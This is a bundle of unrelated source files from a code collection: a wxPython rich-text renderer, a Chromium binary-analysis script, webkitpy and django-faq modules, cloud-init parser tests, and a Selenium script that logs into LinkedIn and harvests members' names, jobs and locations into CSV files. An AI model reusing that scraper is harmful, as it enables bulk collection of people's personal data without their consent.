_weights = {"normal" : wx.NORMAL, "light" : wx.LIGHT, "bold" : wx.BOLD}
# The next three classes: Renderer, SizeRenderer and DCRenderer are
# what you will need to override to extend the XML language. All of
# the font stuff as well as the subscript and superscript stuff are in
# Renderer.
_greek_letters = ("alpha", "beta", "gamma", "delta", "epsilon", "zeta",
"eta", "theta", "iota", "kappa", "lambda", "mu", "nu",
"xi", "omnikron", "pi", "rho", "altsigma", "sigma", "tau", "upsilon",
"phi", "chi", "psi", "omega")
def iround(number):
return int(round(number))
def iceil(number):
return int(math.ceil(number))
class Renderer:
"""Class for rendering XML marked up text.
See the module docstring for a description of the markup.
This class must be subclassed and the methods the methods that do
the drawing overridden for a particular output device.
"""
defaultSize = None
defaultFamily = wx.DEFAULT
defaultStyle = wx.NORMAL
defaultWeight = wx.NORMAL
defaultEncoding = None
defaultColor = "black"
def __init__(self, dc=None, x=0, y=None):
if dc == None:
dc = wx.MemoryDC()
self.dc = dc
self.offsets = [0]
self.fonts = [{}]
self.width = self.height = 0
self.x = x
self.minY = self.maxY = self._y = y
if Renderer.defaultSize is None:
Renderer.defaultSize = wx.NORMAL_FONT.GetPointSize()
if Renderer.defaultEncoding is None:
Renderer.defaultEncoding = wx.Font_GetDefaultEncoding()
def getY(self):
if self._y is None:
self.minY = self.maxY = self._y = self.dc.GetTextExtent("M")[1]
return self._y
def setY(self, value):
self._y = y
y = property(getY, setY)
def startElement(self, name, attrs):
method = "start_" + name
if not hasattr(self, method):
raise ValueError("XML tag '%s' not supported" % name)
getattr(self, method)(attrs)
def endElement(self, name):
methname = "end_" + name
if hasattr(self, methname):
getattr(self, methname)()
elif hasattr(self, "start_" + name):
pass
else:
raise ValueError("XML tag '%s' not supported" % methname)
def characterData(self, data):
self.dc.SetFont(self.getCurrentFont())
for i, chunk in enumerate(data.split('\n')):
if i:
self.x = 0
self.y = self.mayY = self.maxY + self.dc.GetTextExtent("M")[1]
if chunk:
width, height, descent, extl = self.dc.GetFullTextExtent(chunk)
self.renderCharacterData(data, iround(self.x), iround(self.y + self.offsets[-1] - height + descent))
else:
width = height = descent = extl = 0
self.updateDims(width, height, descent, extl)
def updateDims(self, width, height, descent, externalLeading):
self.x += width
self.width = max(self.x, self.width)
self.minY = min(self.minY, self.y+self.offsets[-1]-height+descent)
self.maxY = max(self.maxY, self.y+self.offsets[-1]+descent)
self.height = self.maxY - self.minY
def start_FancyText(self, attrs):
pass
start_wxFancyText = start_FancyText # For backward compatibility
def start_font(self, attrs):
for key, value in attrs.items():
if key == "size":
value = int(value)
elif key == "family":
value = _families[value]
elif key == "style":
value = _styles[value]
elif key == "weight":
value = _weights[value]
elif key == "encoding":
value = int(value)
elif key == "color":
pass
else:
raise ValueError("unknown font attribute '%s'" % key)
attrs[key] = value
font = copy.copy(self.fonts[-1])
font.update(attrs)
self.fonts.append(font)
def end_font(self):
self.fonts.pop()
def start_sub(self, attrs):
if attrs.keys():
raise ValueError("<sub> does not take attributes")
font = self.getCurrentFont()
self.offsets.append(self.offsets[-1] + self.dc.GetFullTextExtent("M", font)[1]*0.5)
self.start_font({"size" : font.GetPointSize() * 0.8})
def end_sub(self):
self.fonts.pop()
self.offsets.pop()
def start_sup(self, attrs):
if attrs.keys():
raise ValueError("<sup> does not take attributes")
font = self.getCurrentFont()
self.offsets.append(self.offsets[-1] - self.dc.GetFullTextExtent("M", font)[1]*0.3)
self.start_font({"size" : font.GetPointSize() * 0.8})
def end_sup(self):
self.fonts.pop()
self.offsets.pop()
def getCurrentFont(self):
font = self.fonts[-1]
return wx.Font(font.get("size", self.defaultSize),
font.get("family", self.defaultFamily),
font.get("style", self.defaultStyle),
font.get("weight",self.defaultWeight),
False, "",
font.get("encoding", self.defaultEncoding))
def getCurrentColor(self):
font = self.fonts[-1]
return wx.TheColourDatabase.FindColour(font.get("color", self.defaultColor))
def getCurrentPen(self):
return wx.Pen(self.getCurrentColor(), 1, wx.SOLID)
def renderCharacterData(self, data, x, y):
raise NotImplementedError()
def _addGreek():
alpha = 0xE1
Alpha = 0xC1
def end(self):
pass
for i, name in enumerate(_greek_letters):
def start(self, attrs, code=chr(alpha+i)):
self.start_font({"encoding" : _greekEncoding})
self.characterData(code)
self.end_font()
setattr(Renderer, "start_%s" % name, start)
setattr(Renderer, "end_%s" % name, end)
if name == "altsigma":
continue # There is no capital for altsigma
def start(self, attrs, code=chr(Alpha+i)):
self.start_font({"encoding" : _greekEncoding})
self.characterData(code)
self.end_font()
setattr(Renderer, "start_%s" % name.capitalize(), start)
setattr(Renderer, "end_%s" % name.capitalize(), end)
_addGreek()
class SizeRenderer(Renderer):
"""Processes text as if rendering it, but just computes the size."""
def __init__(self, dc=None):
Renderer.__init__(self, dc, 0, 0)
def renderCharacterData(self, data, x, y):
pass
def start_angle(self, attrs):
self.characterData("M")
def start_infinity(self, attrs):
width, height = self.dc.GetTextExtent("M")
width = max(width, 10)
height = max(height, width / 2)
self.updateDims(width, height, 0, 0)
def start_times(self, attrs):
self.characterData("M")
def start_in(self, attrs):
self.characterData("M")
def start_times(self, attrs):
self.characterData("M")
class DCRenderer(Renderer):
"""Renders text to a wxPython device context DC."""
def renderCharacterData(self, data, x, y):
self.dc.SetTextForeground(self.getCurrentColor())
self.dc.DrawText(data, x, y)
def start_angle(self, attrs):
self.dc.SetFont(self.getCurrentFont())
self.dc.SetPen(self.getCurrentPen())
width, height, descent, leading = self.dc.GetFullTextExtent("M")
y = self.y + self.offsets[-1]
self.dc.DrawLine(iround(self.x), iround(y), iround( self.x+width), iround(y))
self.dc.DrawLine(iround(self.x), iround(y), iround(self.x+width), iround(y-width))
self.updateDims(width, height, descent, leading)
def start_infinity(self, attrs):
self.dc.SetFont(self.getCurrentFont())
self.dc.SetPen(self.getCurrentPen())
width, height, descent, leading = self.dc.GetFullTextExtent("M")
width = max(width, 10)
height = max(height, width / 2)
self.dc.SetPen(wx.Pen(self.getCurrentColor(), max(1, width/10)))
self.dc.SetBrush(wx.TRANSPARENT_BRUSH)
y = self.y + self.offsets[-1]
r = iround( 0.95 * width / 4)
xc = (2*self.x + width) / 2
yc = iround(y-1.5*r)
self.dc.DrawCircle(xc - r, yc, r)
self.dc.DrawCircle(xc + r, yc, r)
self.updateDims(width, height, 0, 0)
def start_times(self, attrs):
self.dc.SetFont(self.getCurrentFont())
self.dc.SetPen(self.getCurrentPen())
width, height, descent, leading = self.dc.GetFullTextExtent("M")
y = self.y + self.offsets[-1]
width *= 0.8
width = iround(width+.5)
self.dc.SetPen(wx.Pen(self.getCurrentColor(), 1))
self.dc.DrawLine(iround(self.x), iround(y-width), iround(self.x+width-1), iround(y-1))
self.dc.DrawLine(iround(self.x), iround(y-2), iround(self.x+width-1), iround(y-width-1))
self.updateDims(width, height, 0, 0)
def RenderToRenderer(str, renderer, enclose=True):
try:
if enclose:
str = '<?xml version="1.0"?><FancyText>%s</FancyText>' % str
p = xml.parsers.expat.ParserCreate()
p.returns_unicode = 0
p.StartElementHandler = renderer.startElement
p.EndElementHandler = renderer.endElement
p.CharacterDataHandler = renderer.characterData
p.Parse(str, 1)
except xml.parsers.expat.error, err:
raise ValueError('error parsing text text "%s": %s' % (str, err))
# Public interface
def GetExtent(str, dc=None, enclose=True):
"Return the extent of str"
renderer = SizeRenderer(dc)
RenderToRenderer(str, renderer, enclose)
return iceil(renderer.width), iceil(renderer.height) # XXX round up
def GetFullExtent(str, dc=None, enclose=True):
renderer = SizeRenderer(dc)
RenderToRenderer(str, renderer, enclose)
return iceil(renderer.width), iceil(renderer.height), -iceil(renderer.minY) # XXX round up
def RenderToBitmap(str, background=None, enclose=1):
"Return str rendered on a minumum size bitmap"
dc = wx.MemoryDC()
# Chicken and egg problem, we need a bitmap in the DC in order to
# measure how big the bitmap should be...
dc.SelectObject(wx.EmptyBitmap(1,1))
width, height, dy = GetFullExtent(str, dc, enclose)
bmp = wx.EmptyBitmap(width, height)
dc.SelectObject(bmp)
if background is None:
dc.SetBackground(wx.WHITE_BRUSH)
else:
dc.SetBackground(background)
dc.Clear()
renderer = DCRenderer(dc, y=dy)
dc.BeginDrawing()
RenderToRenderer(str, renderer, enclose)
dc.EndDrawing()
dc.SelectObject(wx.NullBitmap)
if background is None:
img = wx.ImageFromBitmap(bmp)
bg = dc.GetBackground().GetColour()
img.SetMaskColour(bg.Red(), bg.Green(), bg.Blue())
bmp = img.ConvertToBitmap()
return bmp
def RenderToDC(str, dc, x, y, enclose=1):
"Render str onto a wxDC at (x,y)"
width, height, dy = GetFullExtent(str, dc)
renderer = DCRenderer(dc, x, y+dy)
RenderToRenderer(str, renderer, enclose)
class StaticFancyText(wx.StaticBitmap):
def __init__(self, window, id, text, *args, **kargs):
args = list(args)
kargs.setdefault('name', 'staticFancyText')
if 'background' in kargs:
background = kargs.pop('background')
elif args:
background = args.pop(0)
else:
background = wx.Brush(window.GetBackgroundColour(), wx.SOLID)
bmp = RenderToBitmap(text, background)
wx.StaticBitmap.__init__(self, window, id, bmp, *args, **kargs)
# Old names for backward compatibiliry
getExtent = GetExtent
renderToBitmap = RenderToBitmap
renderToDC = RenderToDC
# Test Driver
def test():
testText = \
"""<font weight="bold" size="16">FancyText</font> -- <font style="italic" size="16">methods for rendering XML specified text</font>
<font family="swiss" size="12">
This module exports four main methods::
<font family="fixed" style="slant">
def GetExtent(str, dc=None, enclose=True)
def GetFullExtent(str, dc=None, enclose=True)
def RenderToBitmap(str, background=None, enclose=True)
def RenderToDC(str, dc, x, y, enclose=True)
</font>
In all cases, 'str' is an XML string. Note that start and end tags
are only required if *enclose* is set to False. In this case the
text should be wrapped in FancyText tags.
In addition, the module exports one class::
<font family="fixed" style="slant">
class StaticFancyText(self, window, id, text, background, ...)
</font>
This class works similar to StaticText except it interprets its text
as FancyText.
The text can support<sup>superscripts</sup> and <sub>subscripts</sub>, text
in different <font size="20">sizes</font>, <font color="blue">colors</font>, <font style="italic">styles</font>, <font weight="bold">weights</font> and
<font family="script">families</font>. It also supports a limited set of symbols,
currently <times/>, <infinity/>, <angle/> as well as greek letters in both
upper case (<Alpha/><Beta/>...<Omega/>) and lower case (<alpha/><beta/>...<omega/>).
We can use doctest/guitest to display this string in all its marked up glory.
<font family="fixed">
>>> frame = wx.Frame(wx.NULL, -1, "FancyText demo", wx.DefaultPosition)
>>> sft = StaticFancyText(frame, -1, __doc__, wx.Brush("light grey", wx.SOLID))
>>> frame.SetClientSize(sft.GetSize())
>>> didit = frame.Show()
>>> from guitest import PauseTests; PauseTests()
</font></font>
The End"""
app = wx.PySimpleApp()
box = wx.BoxSizer(wx.VERTICAL)
frame = wx.Frame(None, -1, "FancyText demo", wx.DefaultPosition)
frame.SetBackgroundColour("light grey")
sft = StaticFancyText(frame, -1, testText)
box.Add(sft, 1, wx.EXPAND)
frame.SetSizer(box)
frame.SetAutoLayout(True)
box.Fit(frame)
box.SetSizeHints(frame)
frame.Show()
app.MainLoop()
if __name__ == "__main__":
test()
|
GeyerA/android_external_chromium_org
|
refs/heads/master
|
tools/linux/dump-static-initializers.py
|
68
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Dump functions called by static intializers in a Linux Release binary.
Usage example:
tools/linux/dump-static-intializers.py out/Release/chrome
A brief overview of static initialization:
1) the compiler writes out, per object file, a function that contains
the static intializers for that file.
2) the compiler also writes out a pointer to that function in a special
section.
3) at link time, the linker concatenates the function pointer sections
into a single list of all initializers.
4) at run time, on startup the binary runs all function pointers.
The functions in (1) all have mangled names of the form
_GLOBAL__I_foobar.cc
using objdump, we can disassemble those functions and dump all symbols that
they reference.
"""
import optparse
import re
import subprocess
import sys
# A map of symbol => informative text about it.
NOTES = {
'__cxa_atexit@plt': 'registers a dtor to run at exit',
'std::__ioinit': '#includes <iostream>, use <ostream> instead',
}
# Determine whether this is a git checkout (as opposed to e.g. svn).
IS_GIT_WORKSPACE = (subprocess.Popen(
['git', 'rev-parse'], stderr=subprocess.PIPE).wait() == 0)
class Demangler(object):
"""A wrapper around c++filt to provide a function to demangle symbols."""
def __init__(self):
self.cppfilt = subprocess.Popen(['c++filt'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
def Demangle(self, sym):
"""Given mangled symbol |sym|, return its demangled form."""
self.cppfilt.stdin.write(sym + '\n')
return self.cppfilt.stdout.readline().strip()
# Matches for example: "cert_logger.pb.cc", capturing "cert_logger".
protobuf_filename_re = re.compile(r'(.*)\.pb\.cc$')
def QualifyFilenameAsProto(filename):
"""Attempt to qualify a bare |filename| with a src-relative path, assuming it
is a protoc-generated file. If a single match is found, it is returned.
Otherwise the original filename is returned."""
if not IS_GIT_WORKSPACE:
return filename
match = protobuf_filename_re.match(filename)
if not match:
return filename
basename = match.groups(0)
gitlsfiles = subprocess.Popen(
['git', 'ls-files', '--', '*/%s.proto' % basename],
stdout=subprocess.PIPE)
candidate = filename
for line in gitlsfiles.stdout:
if candidate != filename:
return filename # Multiple hits, can't help.
candidate = line.strip()
return candidate
# Regex matching the substring of a symbol's demangled text representation most
# likely to appear in a source file.
# Example: "v8::internal::Builtins::InitBuiltinFunctionTable()" becomes
# "InitBuiltinFunctionTable", since the first (optional & non-capturing) group
# picks up any ::-qualification and the last fragment picks up a suffix that
# starts with an opener.
symbol_code_name_re = re.compile(r'^(?:[^(<[]*::)?([^:(<[]*).*?$')
def QualifyFilename(filename, symbol):
"""Given a bare filename and a symbol that occurs in it, attempt to qualify
it with a src-relative path. If more than one file matches, return the
original filename."""
if not IS_GIT_WORKSPACE:
return filename
match = symbol_code_name_re.match(symbol)
if not match:
return filename
symbol = match.group(1)
gitgrep = subprocess.Popen(
['git', 'grep', '-l', symbol, '--', '*/%s' % filename],
stdout=subprocess.PIPE)
candidate = filename
for line in gitgrep.stdout:
if candidate != filename: # More than one candidate; return bare filename.
return filename
candidate = line.strip()
return candidate
# Regex matching nm output for the symbols we're interested in.
# See test_ParseNmLine for examples.
nm_re = re.compile(r'(\S+) (\S+) t (?:_ZN12)?_GLOBAL__(?:sub_)?I_(.*)')
def ParseNmLine(line):
"""Given a line of nm output, parse static initializers as a
(file, start, size) tuple."""
match = nm_re.match(line)
if match:
addr, size, filename = match.groups()
return (filename, int(addr, 16), int(size, 16))
def test_ParseNmLine():
"""Verify the nm_re regex matches some sample lines."""
parse = ParseNmLine(
'0000000001919920 0000000000000008 t '
'_ZN12_GLOBAL__I_safe_browsing_service.cc')
assert parse == ('safe_browsing_service.cc', 26319136, 8), parse
parse = ParseNmLine(
'00000000026b9eb0 0000000000000024 t '
'_GLOBAL__sub_I_extension_specifics.pb.cc')
assert parse == ('extension_specifics.pb.cc', 40607408, 36), parse
# Just always run the test; it is fast enough.
test_ParseNmLine()
def ParseNm(binary):
"""Given a binary, yield static initializers as (file, start, size) tuples."""
nm = subprocess.Popen(['nm', '-S', binary], stdout=subprocess.PIPE)
for line in nm.stdout:
parse = ParseNmLine(line)
if parse:
yield parse
# Regex matching objdump output for the symbols we're interested in.
# Example line:
# 12354ab: (disassembly, including <FunctionReference>)
disassembly_re = re.compile(r'^\s+[0-9a-f]+:.*<(\S+)>')
def ExtractSymbolReferences(binary, start, end):
"""Given a span of addresses, returns symbol references from disassembly."""
cmd = ['objdump', binary, '--disassemble',
'--start-address=0x%x' % start, '--stop-address=0x%x' % end]
objdump = subprocess.Popen(cmd, stdout=subprocess.PIPE)
refs = set()
for line in objdump.stdout:
if '__static_initialization_and_destruction' in line:
raise RuntimeError, ('code mentions '
'__static_initialization_and_destruction; '
'did you accidentally run this on a Debug binary?')
match = disassembly_re.search(line)
if match:
(ref,) = match.groups()
if ref.startswith('.LC') or ref.startswith('_DYNAMIC'):
# Ignore these, they are uninformative.
continue
if ref.startswith('_GLOBAL__I_'):
# Probably a relative jump within this function.
continue
refs.add(ref)
return sorted(refs)
def main():
parser = optparse.OptionParser(usage='%prog [option] filename')
parser.add_option('-d', '--diffable', dest='diffable',
action='store_true', default=False,
help='Prints the filename on each line, for more easily '
'diff-able output. (Used by sizes.py)')
opts, args = parser.parse_args()
if len(args) != 1:
parser.error('missing filename argument')
return 1
binary = args[0]
demangler = Demangler()
file_count = 0
initializer_count = 0
files = ParseNm(binary)
if opts.diffable:
files = sorted(files)
for filename, addr, size in files:
file_count += 1
ref_output = []
qualified_filename = QualifyFilenameAsProto(filename)
if size == 2:
# gcc generates a two-byte 'repz retq' initializer when there is a
# ctor even when the ctor is empty. This is fixed in gcc 4.6, but
# Android uses gcc 4.4.
ref_output.append('[empty ctor, but it still has cost on gcc <4.6]')
else:
for ref in ExtractSymbolReferences(binary, addr, addr+size):
initializer_count += 1
ref = demangler.Demangle(ref)
if qualified_filename == filename:
qualified_filename = QualifyFilename(filename, ref)
note = ''
if ref in NOTES:
note = NOTES[ref]
elif ref.endswith('_2eproto()'):
note = 'protocol compiler bug: crbug.com/105626'
if note:
ref_output.append('%s [%s]' % (ref, note))
else:
ref_output.append(ref)
if opts.diffable:
print '\n'.join('# ' + qualified_filename + ' ' + r for r in ref_output)
else:
print '%s (initializer offset 0x%x size 0x%x)' % (qualified_filename,
addr, size)
print ''.join(' %s\n' % r for r in ref_output)
if opts.diffable:
print '#',
print 'Found %d static initializers in %d files.' % (initializer_count,
file_count)
return 0
if '__main__' == __name__:
sys.exit(main())
|
shinate/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/watchlist/changedlinepattern.py
|
134
|
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class ChangedLinePattern:
def __init__(self, compile_regex, index_for_zero_value):
self._regex = compile_regex
self._index_for_zero_value = index_for_zero_value
def match(self, path, diff_file):
for diff_line in diff_file:
if diff_line[self._index_for_zero_value]:
continue
if self._regex.search(diff_line[2]):
return True
return False
|
benspaulding/django-faq
|
refs/heads/master
|
faq/models.py
|
1
|
# -*- coding: utf-8 -*-
from django.db import models
from django.conf import settings
from django.contrib.sites.models import Site
from django.template.defaultfilters import slugify
from django.utils.translation import ugettext_lazy as _
from faq.settings import DRAFTED, PUBLISHED, REMOVED, STATUS_CHOICES
# Managers.
def _field_lookups(model, status=None):
"""
Abstraction of field lookups for managers.
Returns a dictionary of field lookups for a queryset. The lookups
will always filter by site. Optionally, if ``status`` is passed to
the function the objects will also be filtered by the given status.
This function saves from having to make two different on-site and
published Managers each for `Topic` and `Question`, and having to move
Managers out of the `FAQBase` model and into each of the `Topic`
and `Question` models.
"""
# Import models here to avoid circular import fail.
from faq.models import Topic, Question
field_lookups = {}
if model == Topic:
field_lookups['sites__pk'] = settings.SITE_ID
if model == Question:
field_lookups['topic__sites__pk'] = settings.SITE_ID
if status:
field_lookups['topic__status'] = status
# Both Topic & Question have a status field.
if status:
field_lookups['status'] = status
return field_lookups
class OnSiteManager(models.Manager):
"""Custom manager providing shortcuts for filtering by status."""
def on_site(self):
"""Returns only items related to the current site."""
return self.get_query_set().filter(**_field_lookups(self.model))
def drafted(self):
"""Returns only on-site items with a status of 'drafted'."""
return self.get_query_set().filter(
**_field_lookups(self.model, DRAFTED))
def published(self):
"""Returns only on-site items with a status of 'published'."""
return self.get_query_set().filter(
**_field_lookups(self.model, PUBLISHED))
def removed(self):
"""Returns only on-site items with a status of 'removed'."""
return self.get_query_set().filter(
**_field_lookups(self.model, REMOVED))
# Models.
class FAQBase(models.Model):
"""A model holding information common to Topics and Questions."""
created = models.DateTimeField(_(u'date created'), auto_now_add=True)
modified = models.DateTimeField(_(u'date modified'), auto_now=True)
status = models.IntegerField(_(u'status'), choices=STATUS_CHOICES,
# TODO: Genericize/fix the help_text.
db_index=True, default=DRAFTED, help_text=_(u'Only objects with \
"published" status will be displayed publicly.'))
objects = OnSiteManager()
class Meta:
abstract = True
get_latest_by = 'modified'
class Topic(FAQBase):
"""A topic that a Question can belong to."""
title = models.CharField(_(u'title'), max_length=255)
slug = models.SlugField(_(u'slug'), unique=True, help_text=_(u'Used in \
the URL for the topic. Must be unique.'))
description = models.TextField(_(u'description'), blank=True,
help_text=_(u'A short description of this topic.'))
sites = models.ManyToManyField(Site, verbose_name=_(u'sites'),
related_name='faq_topics')
class Meta(FAQBase.Meta):
ordering = ('title', 'slug')
verbose_name = _(u'topic')
verbose_name_plural = _(u'topics')
def __unicode__(self):
return self.title
@models.permalink
def get_absolute_url(self):
return ('faq-topic-detail', (), {'slug': self.slug})
class Question(FAQBase):
"""A frequently asked question."""
question = models.CharField(_(u'question'), max_length=255)
slug = models.SlugField(_(u'slug'), unique=True, help_text=_(u'Used in \
the URL for the Question. Must be unique.'))
answer = models.TextField(_(u'answer'))
topic = models.ForeignKey(Topic, verbose_name=_(u'topic'),
related_name='questions')
ordering = models.PositiveSmallIntegerField(_(u'ordering'), blank=True,
db_index=True, help_text=_(u'An integer used to order the question \
amongst others related to the same topic. If not given this \
question will be last in the list.'))
class Meta(FAQBase.Meta):
ordering = ('ordering', 'question', 'slug')
verbose_name = _(u'question')
verbose_name_plural = _(u'questions')
def __unicode__(self):
return self.question
def save(self, *args, **kwargs):
if not self.slug:
# We populate the slug here because the common case for adding an
# Question is as an inline to a Topic and InlineModelAdmin does not
# currently support ``prepopulated_fields`` and it's mean to make
# the user supply a slug by hand.
self.slug = slugify(self.question)[:50]
if not self.ordering:
# When adding an Question to a Topic, it's easy to overlook the
# ordering. We don't want to throw an error if it's left blank,
# so to be nice we'll just put it at the end of the list.
try:
# Find the highest ordering value for all other Questions
# related to the same topic and add 1.
ordering = self.topic.questions.exclude(pk=self.pk).aggregate(
models.Max('ordering'))['ordering__max'] + 1
except TypeError:
# There are no other related Questions, so let's set this
# as no. 1.
ordering = 1
self.ordering = ordering
super(Question, self).save(*args, **kwargs)
@models.permalink
def get_absolute_url(self):
return ('faq-question-detail', (), {'topic_slug': self.topic.slug,
'slug': self.slug})
|
brkrishna/freelance
|
refs/heads/master
|
linkedin/linkedin_soup.py
|
1
|
# -- coding: utf-8 --
#-------------------------------------------------------------------------------
# Name: linkedin
# Purpose: Parse linked in given a list of companies and write users to a csv file
#
# Author: Ramakrishna
#
# Created: 21/Jan/2016
# Copyright: (c) Ramakrishna 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
from selenium import webdriver # - Can leverage Firefox / PhantomJS
from selenium.webdriver.common.keys import Keys #Used to simulate user typing in search box
#from lxml import html # to parse members list from html page
from bs4 import BeautifulSoup #Using BS4 instead of lxml - customer is king :-)
import configparser #To read settings for the program
import time, random, os, re #time - for delay to allow pages to load, random - to generate random wait time,
#os - get Operating system handle, re - regular expressions to read amounts from text
'''
Logging temporarily for debug purposes, can be removed once the script is stable or integrated with other code
'''
import logging
# create logger
logger = logging.getLogger('linkedin_scraper')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('linkedin.log')
fh.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
SECTION ='SETUP'
def main():
d = None
try:
Config = configparser.ConfigParser()
Config.read('settings.ini')
settings = {}
options = Config[SECTION]
for option in options:
try:
settings[option] = Config[SECTION][option]
except:
settings[option] = None
min_wait = int(settings['min_wait'])
max_wait = int(settings['max_wait'])
logger.debug("Finished reading config settings...")
companies = set(open('companies').readlines())
if os.path.isfile('companies_done'):
finished_companies = set(open('companies_done').readlines())
companies -= finished_companies
logger.debug("Filtered companies to be processed...")
d = webdriver.Firefox()
d.get(settings['base_url'])
d.find_element_by_id('login-email').send_keys(settings['user_id'])
d.find_element_by_id('login-password').send_keys(settings['passwd'])
logger.debug("Logged in...")
d.find_element_by_name('submit').click()
time.sleep(random.randint(min_wait,max_wait))
d.find_element_by_id('main-search-box').clear()
for company in companies:
try:
logger.debug("Searching for company - " + company.replace("\n",""))
d.find_element_by_id('main-search-box').clear()
d.find_element_by_id('main-search-box').send_keys(company.replace("\n",""))
d.find_element_by_name('search').click()
time.sleep(random.randint(min_wait,max_wait))
#tree = html.fromstring(d.page_source)
tree = BeautifulSoup(d.page_source, "html.parser") #the default parser
#Loop through for all pages as long as you have records
records = []
counter = 4
while tree != None:
#Loop only for 3 pages, to test
counter -= 1
if counter == 0:
tree = None
continue
#user_details = tree.xpath("//div[@class='bd']")
user_details = tree.find_all('div', {'class':'bd'})
logger.debug("Found - " + str(len(user_details)) + " records...")
for user in user_details:
name = role = org = location = industry = ''
row = {}
try:
#temp = user.xpath("h3//text()")
#name = '"' + temp[:1][0] + '"'
name = user.find('h3').find('a').text
#TODO - Can derive the level of connection with rest of the temp value
except:
continue #We cannot do anything without name, so move on to next record
try:
#temp = user.xpath("div[@class='description']//text()")
temp = user.find('div', {'class':'description'}).text
#role = '"' + temp[:1][0].replace('at', "").strip() + '"'
#org = '"' + temp[1:][0].strip() + '"'
role = '"' + temp[:temp.find("at")].strip() + '"'
org = '"' + temp[temp.find("at")+2:].strip() + '"'
except:
#pass
continue #We cannot do anything without role, so move on to next record
try:
#temp = user.xpath("dl[@class='demographic']//text()")
#location = '"' + temp[1] + '"'
location = '"' + user.find('dl',{'class':'demographic'}).find_all('dd')[0].text
#industry = '"' + temp[3] + '"'
industry = '"' + user.find('dl',{'class':'demographic'}).find_all('dd')[1].text
except:
pass
records.append(name + "," + role + "," + org + "," + location + "," + industry + "\n")
try:
logger.debug("Parsing members for company - " + company.replace("\n",""))
next_page = d.find_element_by_partial_link_text('Next')
next_page.click()
time.sleep(random.randint(min_wait,max_wait))
tree = html.fromstring(d.page_source)
except:
tree = None
pass
file_name = company.replace("\n","").replace(" ", "_").lower()
wrote_header = False
if os.path.isfile(file_name + '.csv'): #file exists don't write header
wrote_header = True
with open(file_name + '.csv', 'a') as f:
for record in records:
if wrote_header == False:
f.write("name, role, org, location, industry" + "\n")
wrote_header = True
f.write(record)
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
with open('companies_done','a') as f:
f.write(company)
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
d.quit() if d != None else None
if __name__ == '__main__':
main()
|
cloudsigma/cloud-init
|
refs/heads/master
|
tests/unittests/test_distros/test_sysconfig.py
|
8
|
from mocker import MockerTestCase
import re
from cloudinit.distros.parsers.sys_conf import SysConf
# Lots of good examples @
# http://content.hccfl.edu/pollock/AUnix1/SysconfigFilesDesc.txt
class TestSysConfHelper(MockerTestCase):
# This function was added in 2.7, make it work for 2.6
def assertRegMatches(self, text, regexp):
regexp = re.compile(regexp)
self.assertTrue(regexp.search(text),
msg="%s must match %s!" % (text, regexp.pattern))
def test_parse_no_change(self):
contents = '''# A comment
USESMBAUTH=no
KEYTABLE=/usr/lib/kbd/keytables/us.map
SHORTDATE=$(date +%y:%m:%d:%H:%M)
HOSTNAME=blahblah
NETMASK0=255.255.255.0
# Inline comment
LIST=$LOGROOT/incremental-list
IPV6TO4_ROUTING='eth0-:0004::1/64 eth1-:0005::1/64'
ETHTOOL_OPTS="-K ${DEVICE} tso on; -G ${DEVICE} rx 256 tx 256"
USEMD5=no'''
conf = SysConf(contents.splitlines())
self.assertEquals(conf['HOSTNAME'], 'blahblah')
self.assertEquals(conf['SHORTDATE'], '$(date +%y:%m:%d:%H:%M)')
# Should be unquoted
self.assertEquals(conf['ETHTOOL_OPTS'], ('-K ${DEVICE} tso on; '
'-G ${DEVICE} rx 256 tx 256'))
self.assertEquals(contents, str(conf))
def test_parse_shell_vars(self):
contents = 'USESMBAUTH=$XYZ'
conf = SysConf(contents.splitlines())
self.assertEquals(contents, str(conf))
conf = SysConf('')
conf['B'] = '${ZZ}d apples'
# Should be quoted
self.assertEquals('B="${ZZ}d apples"', str(conf))
conf = SysConf('')
conf['B'] = '$? d apples'
self.assertEquals('B="$? d apples"', str(conf))
contents = 'IPMI_WATCHDOG_OPTIONS="timeout=60"'
conf = SysConf(contents.splitlines())
self.assertEquals('IPMI_WATCHDOG_OPTIONS=timeout=60', str(conf))
def test_parse_adjust(self):
contents = 'IPV6TO4_ROUTING="eth0-:0004::1/64 eth1-:0005::1/64"'
conf = SysConf(contents.splitlines())
# Should be unquoted
self.assertEquals('eth0-:0004::1/64 eth1-:0005::1/64',
conf['IPV6TO4_ROUTING'])
